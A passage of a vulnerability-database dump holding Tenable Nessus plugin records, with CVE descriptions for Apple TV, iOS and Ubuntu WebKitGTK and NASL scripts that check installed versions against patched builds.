attacker can exploit this to cause a denial of\n service condition or the disclosure of memory contents.\n (CVE-2016-9642)\n\n - A denial of service vulnerability exists in WebKit when\n handling certain regular expressions. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted web page, to exhaust available memory\n resources. (CVE-2016-9643)\n\n - An information disclosure vulnerability exists in WebKit\n when handling page loading due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this to disclose data cross-origin.\n (CVE-2017-2367)\n\n - A buffer overflow condition exists in the Carbon\n component when handling specially crafted DFONT files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2379)\n\n - An information disclosure vulnerability exists in WebKit\n when handling unspecified exceptions. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to disclose data\n cross-origin. (CVE-2017-2386)\n\n - A flaw exists in the libarchive component due to the\n insecure creation of temporary files. A local attacker\n can exploit this, by using a symlink attack against an\n unspecified file, to cause unexpected changes to be made\n to file system permissions. (CVE-2017-2390)\n\n - Multiple memory corruption issues exist in WebKit that\n allow an unauthenticated, remote attacker to cause a\n denial of service condition or the execution of\n arbitrary code. (CVE-2017-2394, CVE-2017-2395,\n CVE-2017-2396, CVE-2017-2454, CVE-2017-2455,\n CVE-2017-2459, CVE-2017-2460, CVE-2017-2464,\n CVE-2017-2465, CVE-2017-2466, CVE-2017-2468,\n CVE-2017-2469, CVE-2017-2470, CVE-2017-2476)\n\n - A memory corruption issue exists in the Kernel component\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution or arbitrary code. (CVE-2017-2401)\n\n - Multiple memory corruption issues exist in the FontParser\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit these to cause a denial condition\n or the execution of arbitrary code. (CVE-2017-2406,\n CVE-2017-2407, CVE-2017-2487)\n\n - An unspecified type confusion error exists in WebKit\n that allows an unauthenticated, remote attacker to\n execute arbitrary code by using specially crafted web\n content. (CVE-2017-2415)\n\n - A memory corruption issue exists in the ImageIO\n component, specifically in the GIFReadPlugin::init()\n function, when handling image files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted image\n file, to cause a denial of service condition or the\n execution of arbitrary code. (CVE-2017-2416)\n\n - An infinite recursion condition exists in the\n CoreGraphics component when handling image files. An\n unauthenticated, remote can exploit this, via a\n specially crafted image file, to cause a denial of\n service condition. (CVE-2017-2417)\n\n - An unspecified flaw exists related to nghttp2 and\n LibreSSL. An unauthenticated, remote attacker can\n exploit this, by convincing a user to access a malicious\n HTTP/2 server, to have an unspecified impact on\n confidentiality, integrity, and availability.\n (CVE-2017-2428)\n\n - A type confusion error exists in the Audio component\n when parsing specially crafted M4A audio files due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2430)\n\n - An integer overflow condition exists in the ImageIO\n component when handling JPEG files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2432)\n\n - A memory corruption issue exists in the CoreText\n component when handling font files due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2017-2435)\n\n - An out-of-bounds read error exists in the FontParser\n component when handling font files. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted file, to disclose process memory.\n (CVE-2017-2439)\n\n - An integer overflow condition exists in the Kernel\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to execute arbitrary code with kernel-level\n privileges. (CVE-2017-2440)\n\n - A use-after-free error exists in libc++abi when\n demangling C++ applications. An unauthenticated, remote\n attacker can exploit this, by convincing a user to run a\n specially crafted application, to execute arbitrary\n code. (CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in the Security component due\n to improper validation of OTR packets under certain\n conditions. A man-in-the-middle attacker can exploit\n this to disclose and optionally manipulate transmitted\n data by spoofing the TLS/SSL server via a packet that\n appears to be valid. (CVE-2017-2448)\n\n - An out-of-bounds read error exists in CoreText component\n when handling font files. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to disclose process memory. (CVE-2017-2450)\n\n - A buffer overflow condition exists in the Security\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this,\n by convincing a user to run a specially crafted\n application, to execute arbitrary code with root\n root privileges. (CVE-2017-2451)\n\n - A race condition exists in the Kernel component when\n handling memory using the 'mach_msg' system call. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a heap-based buffer overflow,\n resulting in a denial of service condition or the\n execution of arbitrary code with root privileges.\n CVE-2017-2456)\n\n - An buffer overflow condition exists in the Keyboards\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2458)\n\n - A denial of service vulnerability exists in the\n CoreText component when handling specially crafted text\n messages due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n exhaust available resources on the system.\n (CVE-2017-2461)\n\n - A heap buffer overflow condition exists in the Audio\n component when parsing specially crafted M4A audio files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to execute arbitrary code.\n (CVE-2017-2462)\n\n - An memory corruption issue exists in the ImageIO\n component when handling specially crafted files due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2467)\n\n - A use-after-free error exists in the Kernel component in\n the XNU port actions extension due to improper handling\n of port references in error cases. An local attacker can\n exploit this to deference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2472)\n\n - A signedness error exists in the Kernel component in the\n SIOCSIFORDER IOCTL due to improper validation of certain\n input. A local attacker can exploit this to cause an\n out-of-bounds read and memory corruption, resulting in\n a denial of service condition or the execution of\n arbitrary code with kernel-level privileges.\n (CVE-2017-2473)\n\n - A off-by-one overflow condition exists in the Kernel\n component in the SIOCSIFORDER IOCTL due to improper\n validation of certain input. A local attacker can exploit\n this to cause a heap-based buffer overflow, resulting in\n the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2474)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A race condition exists in the Kernel component in the\n necp_open() function when closing files descriptors due\n to improper handling of proc_fd locks. A local attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2478)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects. An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A heap buffer overflow condition exists in the Kernel\n component within the Berkeley Packet Filter (BPF)\n BIOCSBLEN IOCTL due to improper validation of certain\n input when reattaching to an interface. A local attacker\n can exploit this to cause a denial of service condition\n or the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2482)\n\n - An off-by-one error exists in the Kernel component,\n specifically in the audit_pipe_open() function, when\n handling auditpipe devices due to improper validation of\n certain input. A local attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2483)\n\n - An unspecified memory corruption issue exists in the\n Security component when parsing X.509 certificates due\n to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2485)\n\n - A double-free error exists in the Kernel component due\n to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking\n devices. A local attacker can exploit this to corrupt\n memory, resulting in the execution of arbitrary code\n with elevated privileges. (CVE-2017-2490)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw. An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\n\nNote that only 4th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207601\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00007.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1dbb626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 10.2 or later. Note that this update is\nonly available for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2490\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"14W265\";\ntvos_ver = '10.2';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:41:24", "description": "Versions of Apple TV earlier than 10.2 are affected by multiple vulnerabilities :\n\n - An unspecified flaw exists related to 'nghttp2' and 'LibreSSL' that is triggered during the handling of a malicious HTTP/2 server. This may allow an attacker to have multiple unspecified impacts. (CVE-2017-2428)\n - A type confusion flaw exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2430)\n - A use-after-free flaw exists in 'libc++' that is triggered when demangling C++ applications. This may allow a malicious application to dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2441)\n - A flaw exists as OTR packets are not properly validated. By spoofing the TLS/SSL server via a packet that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data. (CVE-2017-2448)\n - An overflow condition exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to cause a heap-based buffer overflow, potentially allowing execution of arbitrary code. (CVE-2017-2462)\n - An unspecified flaw exists that is triggered as certain input is not properly validated when parsing X.509 certificates. This may allow a context dependent-attacker to corrupt memory and potentially execute arbitrary code.\n\nAdditional flaws exist in the following components :\n\n - Carbon (CVE-2017-2379)\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417, CVE-2017-2444)\n - CoreText (CVE-2017-2435, CVE-2017-2450, CVE-2017-2461)\n - FontParser (CVE-2017-2406, CVE-2017-2407, CVE-2017-2439, CVE-2017-2487)\n - ImageIO (CVE-2017-2416, CVE-2017-2432, CVE-2017-2467)\n - Kernel (CVE-2017-2401, CVE-2017-2440, CVE-2017-2456, CVE-2017-2472, CVE-2017-2473, CVE-2017-2474, CVE-2017-2478, CVE-2017-2482, CVE-2017-2483, CVE-2017-2490)\n - Keyboards (CVE-2017-2458)\n - libarchive (CVE-2017-2390)\n - Security (CVE-2017-2451)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-02T00:00:00", "type": "nessus", "title": "Apple TV < 10.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:apple_tv:*:*:*:*:*:*:*:*"], "id": "700035.PRM", "href": "https://www.tenable.com/plugins/nnm/700035", "sourceData": "Binary data 700035.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:16", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-04-11T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 16.10 : webkit2gtk vulnerabilities (USN-3257-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2386", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3257-1.NASL", "href": "https://www.tenable.com/plugins/nessus/99278", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3257-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99278);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\", \"CVE-2017-2376\", \"CVE-2017-2377\", \"CVE-2017-2386\", \"CVE-2017-2392\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\", \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\", \"CVE-2017-2447\", \"CVE-2017-2454\", \"CVE-2017-2455\", \"CVE-2017-2457\", \"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2464\", \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\", \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\", \"CVE-2017-2481\");\n script_xref(name:\"USN\", value:\"3257-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 16.10 : webkit2gtk vulnerabilities (USN-3257-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3257-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.1-0ubuntu0.16.10.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.1-0ubuntu0.16.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:37:14", "description": "The version of iOS running on the mobile device is prior to 10.3, and is affected by multiple vulnerabilities :\n\n - An unspecified state management flaw exists that may allow a context-dependent attacker to spoof the address bar. No further details have been provided. (CVE-2017-2376)\n - An unspecified flaw exists in the handling of HTTP authentication. This may allow a context-dependent attacker to display authentication sheets on arbitrary web sites and cause a denial of service. (CVE-2017-2389)\n - A flaw exists in the password-protected PDF export feature that is triggered as a weak encryption algorithm is used. This may allow an attacker with access to a password-protected document to potentially disclose the document content. (CVE-2017-2391)\n - A flaw exists in the 'SecKeyRawVerify()' function that is triggered as parameters are not properly validated during the handling of cryptographic API calls. This may allow a remote attacker to have an empty signature be accepted as valid. (CVE-2017-2423)\n\nAdditional flaws exist in the following components :\n\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417)\n - DataAccess (CVE-2017-2414)\n - FontParser (CVE-2017-2406, CVE-2017-2407)\n - iCloud (CVE-2017-2397)\n - ImageIO (CVE-2017-2416)\n - iTunes Store (CVE-2017-2412)\n - Kernel (CVE-2017-2398, CVE-2017-2401, CVE-2017-2490)\n - libarchive (CVE-2017-2390)\n - Pasteboard (CVE-2017-2399)\n - Quick Look (CVE-2017-2404)\n - Safari (CVE-2017-2384, CVE-2017-2393, CVE-2017-2400)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Apple iOS < 10.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2386", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2379", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2423", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2404", "CVE-2017-2389", "CVE-2017-2399", "CVE-2017-2453", "CVE-2017-2486", "CVE-2017-2412", "CVE-2017-2444", "CVE-2017-2397", "CVE-2017-2414", "CVE-2017-2434", "CVE-2017-2384", "CVE-2017-2393", "CVE-2017-2400", "CVE-2017-2452", "CVE-2017-2378", "CVE-2017-2424", "CVE-2017-2391"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700034.PRM", "href": "https://www.tenable.com/plugins/nnm/700034", "sourceData": "Binary data 700034.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T14:20:58", "description": "The version of Apple iOS running on the mobile device is prior to 10.3. It is, therefore, affected by multiple vulnerabilities in multiple components, the majority of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these remote code execution vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user. The affected components are as follows :\n\n - Accounts\n - Audio\n - Carbon\n - CoreGraphics\n - CoreText\n - DataAccess\n - FontParser\n - HomeKit\n - 